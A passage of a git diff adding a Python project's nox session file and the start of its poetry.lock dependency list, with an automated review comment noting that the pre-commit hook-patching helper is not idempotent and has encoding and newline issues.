+nox.needs_version = ">= 2021.6.6"
+nox.options.sessions = (
+ "pre-commit",
+ "safety",
+ "mypy",
+ "tests",
+ "typeguard",
+ "xdoctest",
+ "docs-build",
+)
+
+
+def activate_virtualenv_in_precommit_hooks(session: Session) -> None:
+ """Activate virtualenv in hooks installed by pre-commit.
+
+ This function patches git hooks installed by pre-commit to activate the
+ session's virtual environment. This allows pre-commit to locate hooks in
+ that environment when invoked from git.
+
+ Args:
+ session: The Session object.
+ """
+ assert session.bin is not None # noqa: S101
+
+ virtualenv = session.env.get("VIRTUAL_ENV")
+ if virtualenv is None:
+ return
+
+ hookdir = Path(".git") / "hooks"
+ if not hookdir.is_dir():
+ return
+
+ for hook in hookdir.iterdir():
+ if hook.name.endswith(".sample") or not hook.is_file():
+ continue
+
+ text = hook.read_text()
+ bindir = repr(session.bin)[1:-1] # strip quotes
+ if not (
+ Path("A") == Path("a") and bindir.lower() in text.lower() or bindir in text
+ ):
+ continue
+
+ lines = text.splitlines()
+ if not (lines[0].startswith("#!") and "python" in lines[0].lower()):
+ continue
+
+ header = dedent(
+ f"""\
+ import os
+ os.environ["VIRTUAL_ENV"] = {virtualenv!r}
+ os.environ["PATH"] = os.pathsep.join((
+ {session.bin!r},
+ os.environ.get("PATH", ""),
+ ))
+ """
+ )
+
+ lines.insert(1, header)
+ hook.write_text("\n".join(lines))
+
+
+@session(name="pre-commit", python="3.10")
+def precommit(session: Session) -> None:
+ """Lint using pre-commit."""
+ args = session.posargs or ["run", "--all-files", "--show-diff-on-failure"]
+ session.install(
+ "black",
+ "darglint",
+ "flake8",
+ "flake8-bandit",
+ "flake8-bugbear",
+ "flake8-docstrings",
+ "flake8-rst-docstrings",
+ "pep8-naming",
+ "pre-commit",
+ "pre-commit-hooks",
+ "pyupgrade",
+ "reorder-python-imports",
+ )
+ session.run("pre-commit", *args)
+ if args and args[0] == "install":
+ activate_virtualenv_in_precommit_hooks(session)
+
+
+@session(python="3.10")
+def safety(session: Session) -> None:
+ """Scan dependencies for insecure packages."""
+ requirements = session.poetry.export_requirements()
+ session.install("safety")
+ session.run("safety", "check", "--full-report", f"--file={requirements}")
+
+
+@session(python=python_versions)
+def mypy(session: Session) -> None:
+ """Type-check using mypy."""
+ args = session.posargs or ["src", "tests", "docs/conf.py"]
+ session.install(".")
+ session.install("mypy", "pytest")
+ session.run("mypy", *args)
+ if not session.posargs:
+ session.run("mypy", f"--python-executable={sys.executable}", "noxfile.py")
+
+
+@session(python=python_versions)
+def tests(session: Session) -> None:
+ """Run the test suite."""
+ session.install(".")
+ session.install("coverage[toml]", "pytest", "pygments", "requests")
+ try:
+ session.run("coverage", "run", "--parallel", "-m", "pytest", *session.posargs)
+ finally:
+ if session.interactive:
+ session.notify("coverage", posargs=[])
+
+
+@session
+def coverage(session: Session) -> None:
+ """Produce the coverage report."""
+ args = session.posargs or ["report"]
+
+ session.install("coverage[toml]")
+
+ if not session.posargs and any(Path().glob(".coverage.*")):
+ session.run("coverage", "combine")
+
+ session.run("coverage", *args)
+
+
+@session(python=python_versions)
+def typeguard(session: Session) -> None:
+ """Runtime type checking using Typeguard."""
+ session.install(".")
+ session.install("pytest", "typeguard", "pygments")
+ session.run("pytest", f"--typeguard-packages={package}", *session.posargs)
+
+
+@session(python=python_versions)
+def xdoctest(session: Session) -> None:
+ """Run examples with xdoctest."""
+ if session.posargs:
+ args = [package, *session.posargs]
+ else:
+ args = [f"--modname={package}", "--command=all"]
+ if "FORCE_COLOR" in os.environ:
+ args.append("--colored=1")
+
+ session.install(".")
+ session.install("xdoctest[colors]")
+ session.run("python", "-m", "xdoctest", *args)
+
+
+@session(name="docs-build", python="3.10")
+def docs_build(session: Session) -> None:
+ """Build the documentation."""
+ args = session.posargs or ["docs", "docs/_build"]
+ if not session.posargs and "FORCE_COLOR" in os.environ:
+ args.insert(0, "--color")
+
+ session.install(".")
+ session.install("sphinx", "sphinx-click", "furo")
+
+ build_dir = Path("docs", "_build")
+ if build_dir.exists():
+ shutil.rmtree(build_dir)
+
+ session.run("sphinx-build", *args)
+
+
+@session(python="3.10")
+def docs(session: Session) -> None:
+ """Build and serve the documentation with live reloading on file changes."""
+ args = session.posargs or ["--open-browser", "docs", "docs/_build"]
+ session.install(".")
+ session.install("sphinx", "sphinx-autobuild", "sphinx-click", "furo")
+
+ build_dir = Path("docs", "_build")
+ if build_dir.exists():
+ shutil.rmtree(build_dir)
+
+ session.run("sphinx-autobuild", *args)
diff --git a/poetry.lock b/poetry.lock
new file mode 100644
index 0000000..4e6268f
--- /dev/null
+++ b/poetry.lock
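Review bot: `activate_virtualenv_in_precommit_hooks` is not idempotent: the match test (`bindir in text`) stays true after the header has been inserted, and the shebang check still passes, so each `nox -s pre-commit -- install` prepends the `VIRTUAL_ENV`/`PATH` header to the hook file again. Build `header` before the shebang check and skip hooks that already carry it, e.g. `if header in text: continue`, placed right after `lines = text.splitlines()`. The rewrite also uses `hook.read_text()` / `hook.write_text(...)` with the locale default encoding and `"\n".join(lines)` drops the file's trailing newline and any CRLF endings; passing `encoding="utf-8"` to both calls and appending `"\n"` on write would make the patched hook byte-stable apart from the inserted header. Separately, the `mypy` session defaults to `["src", "tests", "docs/conf.py"]`, and I cannot see a `tests/` directory in this patch; if it does not exist yet, the default run fails before type-checking anything.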
@@ -0,0 +1,2139 @@ +[[package]] +name = "alabaster" +version = "0.7.12" +description = "A configurable sidebar-enabled Sphinx theme" +category = "dev" +optional = false +python-versions = "*" + +[[package]] +name = "aspy.refactor-imports" +version = "2.3.0" +description = "Utilities for refactoring imports in python-like syntax." +category = "dev" +optional = false +python-versions = ">=3.7" + +[package.dependencies] +cached-property = "*" + +[[package]] +name = "atomicwrites" +version = "1.4.0" +description = "Atomic file writes." +category = "dev" +optional = false +python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*" + +[[package]] +name = "attrs" +version = "21.4.0" +description = "Classes Without Boilerplate" +category = "main" +optional = false +python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*" + +[package.extras] +dev = ["coverage[toml] (>=5.0.2)", "hypothesis", "pympler", "pytest (>=4.3.0)", "six", "mypy", "pytest-mypy-plugins", "zope.interface", "furo", "sphinx", "sphinx-notfound-page", "pre-commit", "cloudpickle"] +docs = ["furo", "sphinx", "zope.interface", "sphinx-notfound-page"] +tests = ["coverage[toml] (>=5.0.2)", "hypothesis", "pympler", "pytest (>=4.3.0)", "six", "mypy", "pytest-mypy-plugins", "zope.interface", "cloudpickle"] +tests_no_zope = ["coverage[toml] (>=5.0.2)", "hypothesis", "pympler", "pytest (>=4.3.0)", "six", "mypy", "pytest-mypy-plugins", "cloudpickle"] + +[[package]] +name = "babel" +version = "2.10.1" +description = "Internationalization utilities" +category = "dev" +optional = false +python-versions = ">=3.6" + +[package.dependencies] +pytz = ">=2015.7" + +[[package]] +name = "bandit" +version = "1.7.4" +description = "Security oriented static analyser for python code." 
+category = "dev" +optional = false +python-versions = ">=3.7" + +[package.dependencies] +colorama = {version = ">=0.3.9", markers = "platform_system == \"Windows\""} +GitPython = ">=1.0.1" +PyYAML = ">=5.3.1" +stevedore = ">=1.20.0" + +[package.extras] +test = ["coverage (>=4.5.4)", "fixtures (>=3.0.0)", "flake8 (>=4.0.0)", "stestr (>=2.5.0)", "testscenarios (>=0.5.0)", "testtools (>=2.3.0)", "toml", "beautifulsoup4 (>=4.8.0)", "pylint (==1.9.4)"] +toml = ["toml"] +yaml = ["pyyaml"] + +[[package]] +name = "beautifulsoup4" +version = "4.11.1" +description = "Screen-scraping library" +category = "main" +optional = false +python-versions = ">=3.6.0" + +[package.dependencies] +soupsieve = ">1.2" + +[package.extras] +html5lib = ["html5lib"] +lxml = ["lxml"] + +[[package]] +name = "black" +version = "22.3.0" +description = "The uncompromising code formatter." +category = "dev" +optional = false +python-versions = ">=3.6.2" + +[package.dependencies] +click = ">=8.0.0" +mypy-extensions = ">=0.4.3" +pathspec = ">=0.9.0" +platformdirs = ">=2" +tomli = {version = ">=1.1.0", markers = "python_version < \"3.11\""} +typed-ast = {version = ">=1.4.2", markers = "python_version < \"3.8\" and implementation_name == \"cpython\""} +typing-extensions = {version = ">=3.10.0.0", markers = "python_version < \"3.10\""} + +[package.extras] +colorama = ["colorama (>=0.4.3)"] +d = ["aiohttp (>=3.7.4)"] +jupyter = ["ipython (>=7.8.0)", "tokenize-rt (>=3.2.0)"] +uvloop = ["uvloop (>=0.15.2)"] + +[[package]] +name = "bs4" +version = "0.0.1" +description = "Dummy package for Beautiful Soup" +category = "main" +optional = false +python-versions = "*" + +[package.dependencies] +beautifulsoup4 = "*" + +[[package]] +name = "cached-property" +version = "1.5.2" +description = "A decorator for caching properties in classes." 
+category = "dev" +optional = false +python-versions = "*" + +[[package]] +name = "certifi" +version = "2022.5.18.1" +description = "Python package for providing Mozilla's CA Bundle." +category = "main" +optional = false +python-versions = ">=3.6" + +[[package]] +name = "cffi" +version = "1.15.0" +description = "Foreign Function Interface for Python calling C code." +category = "main" +optional = false +python-versions = "*" + +[package.dependencies] +pycparser = "*" + +[[package]] +name = "cfgv" +version = "3.3.1" +description = "Validate configuration and produce human readable error messages." +category = "dev" +optional = false +python-versions = ">=3.6.1" + +[[package]] +name = "chardet" +version = "3.0.4" +description = "Universal encoding detector for Python 2 and 3" +category = "main" +optional = false +python-versions = "*" + +[[package]] +name = "charset-normalizer" +version = "2.0.12" +description = "The Real First Universal Charset Detector. Open, modern and actively maintained alternative to Chardet." +category = "main" +optional = false +python-versions = ">=3.5.0" + +[package.extras] +unicode_backport = ["unicodedata2"] + +[[package]] +name = "click" +version = "8.1.3" +description = "Composable command line interface toolkit" +category = "main" +optional = false +python-versions = ">=3.7" + +[package.dependencies] +colorama = {version = "*", markers = "platform_system == \"Windows\""} +importlib-metadata = {version = "*", markers = "python_version < \"3.8\""} + +[[package]] +name = "colorama" +version = "0.4.4" +description = "Cross-platform colored terminal text." 
+category = "main" +optional = false +python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*" + +[[package]] +name = "coverage" +version = "6.4.1" +description = "Code coverage measurement for Python" +category = "dev" +optional = false +python-versions = ">=3.7" + +[package.dependencies] +tomli = {version = "*", optional = true, markers = "python_full_version <= \"3.11.0a6\" and extra == \"toml\""} + +[package.extras] +toml = ["tomli"] + +[[package]] +name = "darglint" +version = "1.8.1" +description = "A utility for ensuring Google-style docstrings stay up to date with the source code." +category = "dev" +optional = false +python-versions = ">=3.6,<4.0" + +[[package]] +name = "deprecated" +version = "1.2.13" +description = "Python @deprecated decorator to deprecate old python classes, functions or methods." +category = "main" +optional = false +python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*" + +[package.dependencies] +wrapt = ">=1.10,<2" + +[package.extras] +dev = ["tox", "bump2version (<1)", "sphinx (<2)", "importlib-metadata (<3)", "importlib-resources (<4)", "configparser (<5)", "sphinxcontrib-websupport (<2)", "zipp (<2)", "PyTest (<5)", "PyTest-Cov (<2.6)", "pytest", "pytest-cov"] + +[[package]] +name = "distlib" +version = "0.3.4" +description = "Distribution utilities" +category = "dev" +optional = false +python-versions = "*" + +[[package]] +name = "docutils" +version = "0.17.1" +description = "Docutils -- Python Documentation Utilities" +category = "dev" +optional = false +python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*" + +[[package]] +name = "dparse" +version = "0.5.1" +description = "A parser for Python dependency files" +category = "dev" +optional = false +python-versions = ">=3.5" + +[package.dependencies] +packaging = "*" +pyyaml = "*" +toml = "*" + +[package.extras] +pipenv = ["pipenv"] + +[[package]] +name = "filelock" +version = "3.7.0" +description = "A platform independent file lock." 
+category = "dev" +optional = false +python-versions = ">=3.7" + +[package.extras] +docs = ["furo (>=2021.8.17b43)", "sphinx (>=4.1)", "sphinx-autodoc-typehints (>=1.12)"] +testing = ["covdefaults (>=1.2.0)", "coverage (>=4)", "pytest (>=4)", "pytest-cov", "pytest-timeout (>=1.4.2)"] + +[[package]] +name = "flake8" +version = "4.0.1" +description = "the modular source code checker: pep8 pyflakes and co" +category = "dev" +optional = false +python-versions = ">=3.6" + +[package.dependencies] +importlib-metadata = {version = "<4.3", markers = "python_version < \"3.8\""} +mccabe = ">=0.6.0,<0.7.0" +pycodestyle = ">=2.8.0,<2.9.0" +pyflakes = ">=2.4.0,<2.5.0" + +[[package]] +name = "flake8-bandit" +version = "2.1.2" +description = "Automated security testing with bandit and flake8." +category = "dev" +optional = false +python-versions = "*" + +[package.dependencies] +bandit = "*" +flake8 = "*" +flake8-polyfill = "*" +pycodestyle = "*" + +[[package]] +name = "flake8-bugbear" +version = "21.11.29" +description = "A plugin for flake8 finding likely bugs and design problems in your program. Contains warnings that don't belong in pyflakes and pycodestyle." 
+category = "dev" +optional = false +python-versions = ">=3.6" + +[package.dependencies] +attrs = ">=19.2.0" +flake8 = ">=3.0.0" + +[package.extras] +dev = ["coverage", "hypothesis", "hypothesmith (>=0.2)", "pre-commit"] + +[[package]] +name = "flake8-docstrings" +version = "1.6.0" +description = "Extension for flake8 which uses pydocstyle to check docstrings" +category = "dev" +optional = false +python-versions = "*" + +[package.dependencies] +flake8 = ">=3" +pydocstyle = ">=2.1" + +[[package]] +name = "flake8-polyfill" +version = "1.0.2" +description = "Polyfill package for Flake8 plugins" +category = "dev" +optional = false +python-versions = "*" + +[package.dependencies] +flake8 = "*" + +[[package]] +name = "flake8-rst-docstrings" +version = "0.2.5" +description = "Python docstring reStructuredText (RST) validator" +category = "dev" +optional = false +python-versions = ">=3.6" + +[package.dependencies] +flake8 = ">=3.0.0" +pygments = "*" +restructuredtext-lint = "*" + +[[package]] +name = "furo" +version = "2022.4.7" +description = "A clean customisable Sphinx documentation theme." +category = "dev" +optional = false +python-versions = ">=3.6" + +[package.dependencies] +beautifulsoup4 = "*" +pygments = ">=2.7,<3.0" +sphinx = ">=4.0,<5.0" + +[[package]] +name = "gitdb" +version = "4.0.9" +description = "Git Object Database" +category = "dev" +optional = false +python-versions = ">=3.6" + +[package.dependencies] +smmap = ">=3.0.1,<6" + +[[package]] +name = "gitpython" +version = "3.1.27" +description = "GitPython is a python library used to interact with Git repositories" +category = "dev" +optional = false +python-versions = ">=3.7" + +[package.dependencies] +gitdb = ">=4.0.1,<5" +typing-extensions = {version = ">=3.7.4.3", markers = "python_version < \"3.8\""} + +[[package]] +name = "googletrans" +version = "3.0.0" +description = "Free Google Translate API for Python. Translates totally free of charge." 
+category = "main" +optional = false +python-versions = "*" + +[package.dependencies] +httpx = "0.13.3" + +[[package]] +name = "h11" +version = "0.9.0" +description = "A pure-Python, bring-your-own-I/O implementation of HTTP/1.1" +category = "main" +optional = false +python-versions = "*" + +[[package]] +name = "h2" +version = "3.2.0" +description = "HTTP/2 State-Machine based protocol implementation" +category = "main" +optional = false +python-versions = "*" + +[package.dependencies] +hpack = ">=3.0,<4" +hyperframe = ">=5.2.0,<6" + +[[package]] +name = "hpack" +version = "3.0.0" +description = "Pure-Python HPACK header compression" +category = "main" +optional = false +python-versions = "*" + +[[package]] +name = "hstspreload" +version = "2021.12.1" +description = "Chromium HSTS Preload list as a Python package" +category = "main" +optional = false +python-versions = ">=3.6" + +[[package]] +name = "httpcore" +version = "0.9.1" +description = "A minimal low-level HTTP client." +category = "main" +optional = false +python-versions = ">=3.6" + +[package.dependencies] +h11 = ">=0.8,<0.10" +h2 = ">=3.0.0,<4.0.0" +sniffio = ">=1.0.0,<2.0.0" + +[[package]] +name = "httpx" +version = "0.13.3" +description = "The next generation HTTP client." 
+category = "main" +optional = false +python-versions = ">=3.6" + +[package.dependencies] +certifi = "*" +chardet = ">=3.0.0,<4.0.0" +hstspreload = "*" +httpcore = ">=0.9.0,<0.10.0" +idna = ">=2.0.0,<3.0.0" +rfc3986 = ">=1.3,<2" +sniffio = "*" + +[[package]] +name = "hyperframe" +version = "5.2.0" +description = "HTTP/2 framing layer for Python" +category = "main" +optional = false +python-versions = "*" + +[[package]] +name = "identify" +version = "2.5.1" +description = "File identification library for Python" +category = "dev" +optional = false +python-versions = ">=3.7" + +[package.extras] +license = ["ukkonen"] + +[[package]] +name = "idna" +version = "2.10" +description = "Internationalized Domain Names in Applications (IDNA)" +category = "main" +optional = false +python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*" + +[[package]] +name = "imagesize" +version = "1.3.0" +description = "Getting image size from png/jpeg/jpeg2000/gif file" +category = "dev" +optional = false +python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*" + +[[package]] +name = "importlib-metadata" +version = "3.7.3" +description = "Read metadata from Python packages" +category = "main" +optional = false +python-versions = ">=3.6" + +[package.dependencies] +typing-extensions = {version = ">=3.6.4", markers = "python_version < \"3.8\""} +zipp = ">=0.5" + +[package.extras] +docs = ["sphinx", "jaraco.packaging (>=8.2)", "rst.linker (>=1.9)"] +testing = ["pytest (>=3.5,!=3.7.3)", "pytest-checkdocs (>=1.2.3)", "pytest-flake8", "pytest-cov", "pytest-enabler", "packaging", "pep517", "pyfakefs", "flufl.flake8", "pytest-black (>=0.3.7)", "pytest-mypy", "importlib-resources (>=1.3)"] + +[[package]] +name = "iniconfig" +version = "1.1.1" +description = "iniconfig: brain-dead simple config-ini parsing" +category = "dev" +optional = false +python-versions = "*" + +[[package]] +name = "jinja2" +version = "3.1.2" +description = "A very fast and expressive template engine." 
+category = "dev" +optional = false +python-versions = ">=3.7" + +[package.dependencies] +MarkupSafe = ">=2.0" + +[package.extras] +i18n = ["Babel (>=2.7)"] + +[[package]] +name = "livereload" +version = "2.6.3" +description = "Python LiveReload is an awesome tool for web developers" +category = "dev" +optional = false +python-versions = "*" + +[package.dependencies] +six = "*" +tornado = {version = "*", markers = "python_version > \"2.7\""} + +[[package]] +name = "markdown" +version = "3.3.5" +description = "Python implementation of Markdown." +category = "main" +optional = false +python-versions = ">=3.6" + +[package.extras] +testing = ["coverage", "pyyaml"] + +[[package]] +name = "markupsafe" +version = "2.1.1" +description = "Safely add untrusted strings to HTML/XML markup." +category = "dev" +optional = false +python-versions = ">=3.7" + +[[package]] +name = "mccabe" +version = "0.6.1" +description = "McCabe checker, plugin for flake8" +category = "dev" +optional = false +python-versions = "*" + +[[package]] +name = "mypy" +version = "0.910" +description = "Optional static typing for Python" +category = "dev" +optional = false +python-versions = ">=3.5" + +[package.dependencies] +mypy-extensions = ">=0.4.3,<0.5.0" +toml = "*" +typed-ast = {version = ">=1.4.0,<1.5.0", markers = "python_version < \"3.8\""} +typing-extensions = ">=3.7.4" + +[package.extras] +dmypy = ["psutil (>=4.0)"] +python2 = ["typed-ast (>=1.4.0,<1.5.0)"] + +[[package]] +name = "mypy-extensions" +version = "0.4.3" +description = "Experimental type system extensions for programs checked with the mypy typechecker." 
+category = "dev" +optional = false +python-versions = "*" + +[[package]] +name = "nodeenv" +version = "1.6.0" +description = "Node.js virtual environment builder" +category = "dev" +optional = false +python-versions = "*" + +[[package]] +name = "packaging" +version = "21.3" +description = "Core utilities for Python packages" +category = "dev" +optional = false +python-versions = ">=3.6" + +[package.dependencies] +pyparsing = ">=2.0.2,<3.0.5 || >3.0.5" + +[[package]] +name = "pathspec" +version = "0.9.0" +description = "Utility library for gitignore style pattern matching of file paths." +category = "dev" +optional = false +python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*,>=2.7" + +[[package]] +name = "pbr" +version = "5.9.0" +description = "Python Build Reasonableness" +category = "dev" +optional = false +python-versions = ">=2.6" + +[[package]] +name = "pep8-naming" +version = "0.12.1" +description = "Check PEP-8 naming conventions, plugin for flake8" +category = "dev" +optional = false +python-versions = "*" + +[package.dependencies] +flake8 = ">=3.9.1" +flake8-polyfill = ">=1.0.2,<2" + +[[package]] +name = "platformdirs" +version = "2.5.2" +description = "A small Python module for determining appropriate platform-specific dirs, e.g. a \"user data dir\"." 
+category = "dev" +optional = false +python-versions = ">=3.7" + +[package.extras] +docs = ["furo (>=2021.7.5b38)", "proselint (>=0.10.2)", "sphinx-autodoc-typehints (>=1.12)", "sphinx (>=4)"] +test = ["appdirs (==1.4.4)", "pytest-cov (>=2.7)", "pytest-mock (>=3.6)", "pytest (>=6)"] + +[[package]] +name = "pluggy" +version = "1.0.0" +description = "plugin and hook calling mechanisms for python" +category = "dev" +optional = false +python-versions = ">=3.6" + +[package.dependencies] +importlib-metadata = {version = ">=0.12", markers = "python_version < \"3.8\""} + +[package.extras] +dev = ["pre-commit", "tox"] +testing = ["pytest", "pytest-benchmark"] + +[[package]] +name = "pre-commit" +version = "2.19.0" +description = "A framework for managing and maintaining multi-language pre-commit hooks." +category = "dev" +optional = false +python-versions = ">=3.7" + +[package.dependencies] +cfgv = ">=2.0.0" +identify = ">=1.0.0" +importlib-metadata = {version = "*", markers = "python_version < \"3.8\""} +nodeenv = ">=0.11.1" +pyyaml = ">=5.1" +toml = "*" +virtualenv = ">=20.0.8" + +[[package]] +name = "pre-commit-hooks" +version = "4.2.0" +description = "Some out-of-the-box hooks for pre-commit." 
+category = "dev" +optional = false +python-versions = ">=3.7" + +[package.dependencies] +"ruamel.yaml" = ">=0.15" +toml = "*" + +[[package]] +name = "py" +version = "1.11.0" +description = "library with cross-python path, ini-parsing, io, code, log facilities" +category = "dev" +optional = false +python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*" + +[[package]] +name = "pycodestyle" +version = "2.8.0" +description = "Python style guide checker" +category = "dev" +optional = false +python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*" + +[[package]] +name = "pycparser" +version = "2.21" +description = "C parser in Python" +category = "main" +optional = false +python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*" + +[[package]] +name = "pydantic" +version = "1.9.1" +description = "Data validation and settings management using python type hints" +category = "main" +optional = false +python-versions = ">=3.6.1" + +[package.dependencies] +typing-extensions = ">=3.7.4.3" + +[package.extras] +dotenv = ["python-dotenv (>=0.10.4)"] +email = ["email-validator (>=1.0.3)"] + +[[package]] +name = "pydocstyle" +version = "6.1.1" +description = "Python docstring style checker" +category = "dev" +optional = false +python-versions = ">=3.6" + +[package.dependencies] +snowballstemmer = "*" + +[package.extras] +toml = ["toml"] + +[[package]] +name = "pyflakes" +version = "2.4.0" +description = "passive checker of Python programs" +category = "dev" +optional = false +python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*" + +[[package]] +name = "pygithub" +version = "1.55" +description = "Use the full Github API v3" +category = "main" +optional = false +python-versions = ">=3.6" + +[package.dependencies] +deprecated = "*" +pyjwt = ">=2.0" +pynacl = ">=1.4.0" +requests = ">=2.14.0" + +[package.extras] +integrations = ["cryptography"] + +[[package]] +name = "pygments" +version = "2.12.0" +description = "Pygments is a syntax 
highlighting package written in Python." +category = "dev" +optional = false +python-versions = ">=3.6" + +[[package]] +name = "pyjwt" +version = "2.4.0" +description = "JSON Web Token implementation in Python" +category = "main" +optional = false +python-versions = ">=3.6" + +[package.extras] +crypto = ["cryptography (>=3.3.1)"] +dev = ["sphinx", "sphinx-rtd-theme", "zope.interface", "cryptography (>=3.3.1)", "pytest (>=6.0.0,<7.0.0)", "coverage[toml] (==5.0.4)", "mypy", "pre-commit"] +docs = ["sphinx", "sphinx-rtd-theme", "zope.interface"] +tests = ["pytest (>=6.0.0,<7.0.0)", "coverage[toml] (==5.0.4)"] + +[[package]] +name = "pynacl" +version = "1.5.0" +description = "Python binding to the Networking and Cryptography (NaCl) library" +category = "main" +optional = false +python-versions = ">=3.6" + +[package.dependencies] +cffi = ">=1.4.1" + +[package.extras] +docs = ["sphinx (>=1.6.5)", "sphinx-rtd-theme"] +tests = ["pytest (>=3.2.1,!=3.3.0)", "hypothesis (>=3.27.0)"] + +[[package]] +name = "pyparsing" +version = "3.0.9" +description = "pyparsing module - Classes and methods to define and execute parsing grammars" +category = "dev" +optional = false +python-versions = ">=3.6.8" + +[package.extras] +diagrams = ["railroad-diagrams", "jinja2"] + +[[package]] +name = "pytest" +version = "7.1.2" +description = "pytest: simple powerful testing with Python" +category = "dev" +optional = false +python-versions = ">=3.7" + +[package.dependencies] +atomicwrites = {version = ">=1.0", markers = "sys_platform == \"win32\""} +attrs = ">=19.2.0" +colorama = {version = "*", markers = "sys_platform == \"win32\""} +importlib-metadata = {version = ">=0.12", markers = "python_version < \"3.8\""} +iniconfig = "*" +packaging = "*" +pluggy = ">=0.12,<2.0" +py = ">=1.8.2" +tomli = ">=1.0.0" + +[package.extras] +testing = ["argcomplete", "hypothesis (>=3.56)", "mock", "nose", "pygments (>=2.7.2)", "requests", "xmlschema"] + +[[package]] +name = "pytz" +version = "2022.1" +description = 
"World timezone definitions, modern and historical" +category = "dev" +optional = false +python-versions = "*" + +[[package]] +name = "pyupgrade" +version = "2.32.1" +description = "A tool to automatically upgrade syntax for newer versions." +category = "dev" +optional = false +python-versions = ">=3.7" + +[package.dependencies] +tokenize-rt = ">=3.2.0" + +[[package]] +name = "pyyaml" +version = "6.0" +description = "YAML parser and emitter for Python" +category = "main" +optional = false +python-versions = ">=3.6" + +[[package]] +name = "reorder-python-imports" +version = "2.8.0" +description = "Tool for reordering python imports" +category = "dev" +optional = false +python-versions = ">=3.7" + +[package.dependencies] +"aspy.refactor-imports" = ">=2.3.0,<3" + +[[package]] +name = "requests" +version = "2.28.0" +description = "Python HTTP for Humans." +category = "main" +optional = false +python-versions = ">=3.7, <4" + +[package.dependencies] +certifi = ">=2017.4.17" +charset-normalizer = ">=2.0.0,<2.1.0" +idna = ">=2.5,<4" +urllib3 = ">=1.21.1,<1.27" + +[package.extras] +socks = ["PySocks (>=1.5.6,!=1.5.7)"] +use_chardet_on_py3 = ["chardet (>=3.0.2,<5)"] + +[[package]] +name = "restructuredtext-lint" +version = "1.4.0" +description = "reStructuredText linter" +category = "dev" +optional = false +python-versions = "*" + +[package.dependencies] +docutils = ">=0.11,<1.0" + +[[package]] +name = "rfc3986" +version = "1.5.0" +description = "Validating URI References per RFC 3986" +category = "main" +optional = false +python-versions = "*" + +[package.extras] +idna2008 = ["idna"] + +[[package]] +name = "ruamel.yaml" +version = "0.17.21" +description = "ruamel.yaml is a YAML parser/emitter that supports roundtrip preservation of comments, seq/map flow style, and map key order" +category = "dev" +optional = false +python-versions = ">=3" + +[package.dependencies] +"ruamel.yaml.clib" = {version = ">=0.2.6", markers = "platform_python_implementation == \"CPython\" and 
python_version < \"3.11\""} + +[package.extras] +docs = ["ryd"] +jinja2 = ["ruamel.yaml.jinja2 (>=0.2)"] + +[[package]] +name = "ruamel.yaml.clib" +version = "0.2.6" +description = "C version of reader, parser and emitter for ruamel.yaml derived from libyaml" +category = "dev" +optional = false +python-versions = ">=3.5" + +[[package]] +name = "safety" +version = "1.10.3" +description = "Checks installed dependencies for known vulnerabilities." +category = "dev" +optional = false +python-versions = ">=3.5" + +[package.dependencies] +Click = ">=6.0" +dparse = ">=0.5.1" +packaging = "*" +requests = "*" + +[[package]] +name = "six" +version = "1.16.0" +description = "Python 2 and 3 compatibility utilities" +category = "dev" +optional = false +python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*" + +[[package]] +name = "smmap" +version = "5.0.0" +description = "A pure Python implementation of a sliding window memory map manager" +category = "dev" +optional = false +python-versions = ">=3.6" + +[[package]] +name = "sniffio" +version = "1.2.0" +description = "Sniff out which async library your code is running under" +category = "main" +optional = false +python-versions = ">=3.5" + +[[package]] +name = "snowballstemmer" +version = "2.2.0" +description = "This package provides 29 stemmers for 28 languages generated from Snowball algorithms." +category = "dev" +optional = false +python-versions = "*" + +[[package]] +name = "soupsieve" +version = "2.3.2.post1" +description = "A modern CSS selector implementation for Beautiful Soup." 
+category = "main" +optional = false +python-versions = ">=3.6" + +[[package]] +name = "sphinx" +version = "4.3.2" +description = "Python documentation generator" +category = "dev" +optional = false +python-versions = ">=3.6" + +[package.dependencies] +alabaster = ">=0.7,<0.8" +babel = ">=1.3" +colorama = {version = ">=0.3.5", markers = "sys_platform == \"win32\""} +docutils = ">=0.14,<0.18" +imagesize = "*" +Jinja2 = ">=2.3" +packaging = "*" +Pygments = ">=2.0" +requests = ">=2.5.0" +snowballstemmer = ">=1.1" +sphinxcontrib-applehelp = "*" +sphinxcontrib-devhelp = "*" +sphinxcontrib-htmlhelp = ">=2.0.0" +sphinxcontrib-jsmath = "*" +sphinxcontrib-qthelp = "*" +sphinxcontrib-serializinghtml = ">=1.1.5" + +[package.extras] +docs = ["sphinxcontrib-websupport"] +lint = ["flake8 (>=3.5.0)", "isort", "mypy (>=0.920)", "docutils-stubs", "types-typed-ast", "types-pkg-resources", "types-requests"] +test = ["pytest", "pytest-cov", "html5lib", "cython", "typed-ast"] + +[[package]] +name = "sphinx-autobuild" +version = "2021.3.14" +description = "Rebuild Sphinx documentation on changes, with live-reload in the browser." 
